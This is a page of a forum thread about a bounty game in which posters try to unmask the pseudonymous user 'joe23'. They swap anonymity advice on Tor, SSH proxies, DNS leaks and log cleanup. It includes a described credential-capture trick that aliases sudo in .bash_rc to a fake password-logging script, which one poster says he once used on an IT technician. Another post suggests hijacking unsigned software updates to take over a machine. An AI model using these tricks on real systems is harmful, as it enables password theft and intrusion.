Topic: [joe is dead] http://findmeifyoucan.eu - page 4. (Read 7043 times)

If you are going to pull a heist, its good to know your prepared

wow, this bounty keeps climbing, huh?

Would it be safe to add -X to the ssh command and then run firefox (or other browser, bitcoin client etc) on the VPS (or rent another VPS) to do all Joe's jobs? Also, would it be more secure to use certificate on a smartcard for the connection, not passwords.

-

Maybe he's open to helping you guys by releasing any info he has on joe23 (with my consent)?

So if you ask him and he's ok with it, I will give him my consent to publish anything he has on me in this thread.

Curious if Theymos has a sign up IP which is different than the current IP used...

Ah, good to know.

I think you also deserve some payment for your effort if you share an address. I hope I didn't miss anyone else? afaik I so far gave some monetary incentives to:

• MysteryMiner
• Jasinlee
• Openyoureyes

If I remember correctly, only signing up using TOR is banned, you can actually login and post using TOR no problem.

cool.

sent a little bit to you address as can be seen in this updated screenshot of joes wallet:
(I had to use the VPS proxy to upload it, imgur disallows tor)

http://i.imgur.com/fJdtu.png

OOOPS! I accidentally had electrums connection setup dialog open when I took the screenshot.

I've done things like that in the past, but as you say he's using linux (debian, so nmap says) so it's package manager will check the signature of all packages.

Here's something else which I was intending to do:

If he's using bash, then create an alias within .bash_rc, and link sudo calls to a simple password capturing script.
e.g.
within .bash_rc:
alias sudo="passwordCapture.sh"

Now any time sudo is called (e.g. sudo apt-get update); sudo calls the following 'fake sudo' script which logs the password to a file, tells the user it is wrong, and calls the legit sudo program with the arguments originally passed.



I done this many years ago to my old IT technician, but made the script more fancy by deleting any references once it had complete: he was none the wiser.

--
Thanks joe23, got your transfer.

You seem to have most things covered; but, the more complex you make the chain, the easier it is to slip up and forget/misconfigure something.
Everything were talking about here is what I'm specialising in at University at the moment: digital & anti forensics/security.


Thanks.
1HUnQSAEto29XC5PeHUbaWkPUhec7W7DJN

I'm off to grab a bite to eat; I'll rack my brains when I come back to see what else can be done/is being missed. Hopefully we can get even more input from people on this aswell.

I thought you were dailyanarchist for a while, but couldnt find anything connecting it to your profile.

I think this could be a viable attack.

It would involve some serious page-scraping of bitcointalk. Assuming you guys do that and then have the posting times of all bitcointalk users you could compute a likelyhood of each user being "real me" using various heuristics. Especially over a long period of time, combined with my roughly known timezone info and maybe some manual language analysis in the end, this could potentially boil it down to maybe a handful of users that would then be suspects.

I would consider that to be a pretty dangerous development for my anonymity.

thanks, OpenYourEyes for chipping in. That's some valuable info.

Let me answer some of your questions:


I use

  #> ssh -D 0.0.0.0:55555 [email protected] -o ProxyCommand="~/bin/connect -4 -S localhost:9050 %h %p"

to ssh to the VPS and at the same time setup the proxy, which I connect to using

  #> chromium-browser --proxy-server="socks5://localhost:55555"

I only use chrome through that VPS proxy for bitcointalk. All other browsing activity I do with firefox through tor (use localhost:9050 as proxy).

Very good point about the DNS leaks! Officials could probably evesdrop on the dns server and identify my IP through timing, right?

Would my idea of ensuring at my home router that the box can only go out through tor (drop all other pakets, is that even possible?) help against such "accidental" leaking? Any ideas on how to protect against such accidents in a fool-proof way?


I sure as hell wont enter my real IP in the VPS shell at any time. You sneaky guys might have compromised the machine already and are likely keylogging . I might look through the logs manually, though.


I use onion url http://jhiwjjlqpyawmpjx.onion to access tormail using firefox. As said before, I only use the VPS as proxy for bitcointalk.org because they disallow tor.


I might've said that wrong before. I don't tunnel all traffic through the VPS, just when I need to access sites that don't allow tor connections. Sorry about that misinformation, it was not intentional. I will not try to mislead you guys, at least not at this point, only when you're getting close


Problem is I need a non-tor exit point somewhere for bitcointalk.org. Any other ideas on how to post to bitcointalk?

OpenYourEyes, I'd like to reward your effort if you give me an address, I will.

This obvious hint; either intentionally misleading or correct information, but it indicates timezone somewhere near UTC. Well, it's weekend, so might also be more to east ;-)

Anyway, Europe, not US. If we can trust that.

These posting times could lead to something. He cannot post two posts at the same time (well,could, but most likely not). But Joe and the actual person are, for example, awake at the same time. Would need some statistics.

He paid for the VPS using BTC.

He only need one ssh connection to the server and then use the remote just as standalone pc to do all Joe's jobs. The only connection from his own computer to anything which has anything to do with Joe, is that single ssh connection to that server throught tor. And after what you told, it is most likely made directly with the IP address.

Ie; rent a server in a cloud, install linux and X2Go or freeNX or whatever, then never do anything as Joe anywhere else but by using that computer on the cloud.


But he has to pay for DNS and the server. Can these payments be tracked?

This is exactly what I was going to do if he gave us (or I managed to get) access to his server. He's using Linux so this doesn't apply, but some commonly installed Windows applications check for updates without forcing the use of https. It isn't too hard to trick the software into running your own "update" which would give you pretty much unrestricted access to do whatever you like on the victims machine.

Long and scattered post but here's my 2c.

How are you connecting to the server to administrate it? Do you use SSH over TOR? ||Home (TOR)||  >  ||Server (SSH)||
Are you using Firefox to tunnel your internet activity?

In either case, you need to watch out for DNS leaks. By default, SSH & Firefox (and most applications) will not do DNS lookups through a proxy.

So, if you browse to google.com, your web traffic will be encrypted and tunnelled as you expect, but the DNS request (i.e what is the IP of google) will come from your home internet connection. In firefox (don't know if it affects other browsers), this 'bug' is easily rectified. Go to about:config and set remote.dns to true.
If your connect to your server by running SSH over TOR then never specify the hostname (i.e. ssh findmeifyoucan.eu, or any other domain), as this, again, will force an non-tunnelled DNS lookup. Always use the IP.

A few other things:

• Watch out for any information you leave on the server through log files, etc. (Does a: grep xx.xx.xx.xx /var/log/* -R where xx is your real IP, come up with anything.)
  
• Install some sort of IDS on your server to monitor for new installtions/modifications. If this get compromised then so are you (regardless of if you connecting over TOR). What's to stop the hacker from spoofing the DNS record for tormail, SR, etc and sending your to another server.
  
• Take a look through your .bash_history, it will show all the commands you've executed: things you've done, files you've modified, etc. which could aid an attacker if they gain access. Disable it in your .bash_rc or just ln -s ~/.bash_history /dev/null
  
• Why are you tunnelling all your traffic from your server? As you said yourself, all your traffic originates from one IP address. Even if no body knows the true identity of the person behind this IP, your a leaving an easy trail for people to follow. One lapse in your security, which reveals who own this IP, and everything then can be linked back to you.
  Why not run TOR on your home machine, tunnel your traffic over SSH to the server, and then run TOR on the server aswell? Everything going in and out of the server is going through TOR, then if there is a break in the chain, you'll be protected by your servers IP.
  

Nop... not me.. Nice to see my name mentioned though...


I could care less if you guys know who I am IRL...............